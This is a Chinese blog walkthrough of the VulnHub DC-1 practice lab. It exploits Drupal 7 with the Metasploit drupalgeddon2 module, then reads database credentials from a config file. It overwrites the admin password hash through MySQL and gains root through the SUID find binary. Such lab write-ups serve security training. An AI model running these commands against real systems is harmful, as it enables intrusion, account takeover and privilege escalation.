vulnhub DC: 1 靶机渗透

已于 2023-01-03 18:49:57 修改
阅读量119 收藏
点赞数
文章标签: 网络 安全
于 2023-01-03 18:46:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45908624/article/details/128528568
版权

环境准备

kali攻击机:192.168.153.130

win10攻击机:192.168.1.157

DC-1靶机:???????

一、信息收集

使用 arp-scan   -l  扫描c段(-l为扫描c段)

 得到靶机ip地址 192.168.153.132

使用 nmap  -sV  192.168.153.132  扫描靶机开放端口(-sV探测服务软件的版本)

  得到目标开放端口以及对应服务的软件版本。 

因其开放80端口,浏览器访问一下192.168.153.132,得到一个登陆页面。 

浏览器安装 Wappalyzer网站指纹工具,可在火狐插件中安装。可以看到网站使用了Drupal 7内容管理系统。 

在网页响应头中,也有体现

确实是基于Drupal框架的网页,现在我们打开MSF看看有没有关于Drupal的exp

msfconsole    启动msf 

search  drupal   查看下有没有相关的exp 

 

二、漏洞利用

 use exploit/unix/webapp/drupal_drupalgeddon2    选择此模块进行攻击

 show  options   展示设置

只需设置rhost靶机地址即可

set  rhosts  192.168.153.132 

输入 exploit   开始攻击 ,弹回一个meterpreter的shell

 ls  查看,发现flag1文件

 cat   flag1.txt    查看flag1的内容,好的cms需要配置文件,俺也一样~

 找找cms的配置文件你在何方?

最后在 sites/default 下,找到一个settings.php的文件,查看文件内容,发现flag2字段以及数据库的相关信息,其中包括用户名和密码 。

使用命令shell拿到一个shell

然后再使用命令python -c 'import pty; pty.spawn("/bin/bash")'获取一个交互式shell 

使用命令mysql -udbuser -pR0ck3t  登录MySQL数据库 

使用show databases;命令显示数据库,看到有两个数据库 

然后进入drupaldb数据库查看数据表信息

use  drupaldb     进入数据库

show  tables;  查看所有表

 

可以看到 users 和 users_roles两个表可能有用

select   *   from   users ;    查看users表中的信息

 可以看到pass的内容是加密的,所这里有两种办法,一种是修改用户密码,一种是新添加一个用户,我们首先来看看修改用户密码

先exit 退出mysql

找一找,找一找,用户密码密文的产生脚本是靶机中的/scriptss/password-hash.sh

我们使用这个脚本来生成一个密文,密码就是admin吧

cd..回到www下,输入 php  scripts/password-hash.sh  admin 

生成的密文是:$S$DekQJFPLKlOkkUtE/KxeR4EB1v0owYvkri0TkiM9a.Yvlv5b72AU

mysql -udbuser -pR0ck3t 登录mysql,

update drupaldb.users set pass="$S$DekQJFPLKlOkkUtE/KxeR4EB1v0owYvkri0TkiM9a.Yvlv5b72AU" where name="admin";更改用户admin的密码

 修改成功!使用admin/admin在网页成功登录! 

左上角content,发现flag3

 提示我们需要find查找,然后试试命令find / -name "*flag*"查找flag文件,发现flag4.txt和thefinalflag.txt

 进入到/home/flag4目录下,使用命令cat flag4.txt查看文件

 

提示我们要进入到root账户下 ,所以我们按照权限查找文件

三、提权

使用命令find / -perm -u=s -type f 2>/dev/null

-perm: 按照权限查找
-type: 查块设备d、目录d、字符设备c、管道c、管道p、符号链接l、普通文件f
-u=s: 拥有者是s权限
S权限:设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份,典型的文件是passwd。如果一般用户执行该文件,则在执行过程中,该文件可以获得root权限,从而可以更改用户的密码

ls -al  /usr/bin/passwd   查看文件权限,发现文件有root权限,且在其权限下可读写,可执行 

find  /usr/bin/passwd   -exec  whoami \;

这样执行,是拥有root权限执行的。 

 

find /usr/bin/passwd -exec cat /root/thefinalflag.txt \;

用root权限查看文件

 成功读取到文件内容!

第二种提权方式:

根据flag3的提示,我们知道需要进行提权,首先查看系统上运行的所有的SUID可执行文件,或者是具有root权限的SUID文件。

使用命令find / -user root -perm -4000 -print 2>/dev/null 进行查找

 

使用命令find /usr/bin/passwd -exec '/bin/sh' \;  获取root权限

LZ_KaiHuang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2476
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 756
Vulnhub靶机:DC-1渗透详细过程
vulnhub DC-5 靶机 渗透测试
小松博客
05-23 289
我们把这个文件复制出来 /usr/share/exploitdb/exploits/linux/local/41154.sh。进入shell模式,输入命令find / -perm /4000 2>/dev/null,查找具有SUID权限的命令。发现这下面的时间是在变的,每次刷新都不一样,这里和footer.php的php是一样的,所以我们推测是文件包含漏洞。注意,请不要在kali里面编译,亲测编译后的程序在靶机运行会报错,我是在Centos中编译的。发现一个footer.php,发现每次访问都不一样。
VulnHub DC1靶机渗透测试
weixin_44614631的博客
08-25 956
VulnHub DC1靶机进行渗透测试。最终,得到了四个flag和一个thefinalflag,共5个flag。有两个问题不是特别清楚,需要再进一步学习。 根据网络上两篇博文学习,总结。如果有版权问题,请联系我进行修改或删除...
vulnhub:DC1靶机
qq_63283137的博客
09-12 298
执行完成,获得了meterpreter(Meterpreter是Metasploit框架中的一个扩展模块,是返回给我们的一个控制通道,用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接,功能强大:可以提权、打开shell、显示密码,显示主机信息、截屏、上传下载、隐藏、躲避系统的扫描等)根据第一个flag提示去寻找cms的cinfig file 并且Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看一下发现flag2。
[Vulnhub] DC-1靶机渗透
weixin_45605352的博客
08-03 227
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了22端口(SSH服务)、80端口(HTTP服务)、111端口和57345端口(RPC服务) 0x02 web渗透 访问80端口 ...
看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Aluxian_的博客
03-22 7596
Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/dc-1,292/ Vulnhub靶机安装: 下载好了把安装包
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1023
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
渗透测试学习之vulnhub系列靶机——DC1
jingzhou_666的博客
06-09 1818
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,使用VMware即可直接运行。Drupal 是一个灵活的,基于 LAMP 技术栈的 CMS,它的模块化设计,允许通过安装和卸载模块的方式 添加和移除功能,同时,允许通过安装和卸载主题改变整个网站的视觉感观。在kali当中使用msf查看一下针对这个cms有哪些具体的模块可以使用使用模块弹出 meterpreter >代表利用成功可以继续进行后渗透3、漏洞利用。
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
MPLS相关实验
2302_78454622的博客
08-20 571
4、R1上使用静态,R7上运行rip协议,R8上运行ospf协议。3、在R2、R3、R4、R5、R6上运行MPLS。2、R3、R4、R5、R6运行ospf。1、合理利用IP地址进行分配。一、实验拓扑图以及实验要求。一、实验拓扑图以及实验要求。
哪些类型的企业需要开展TPM管理培训?
最新发布
tianxingjian713的博客
08-23 717
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 828
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
Spring websocket并发发送消息异常的解决
ls1120623840的博客
08-19 326
本文主要介绍了 Spring websocket并发发送消息异常的解决,当多个线程同时尝试通过 WebSocket 会话发送消息时,会抛出异常,下面就来解决一下,感兴趣的可以了解一下。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值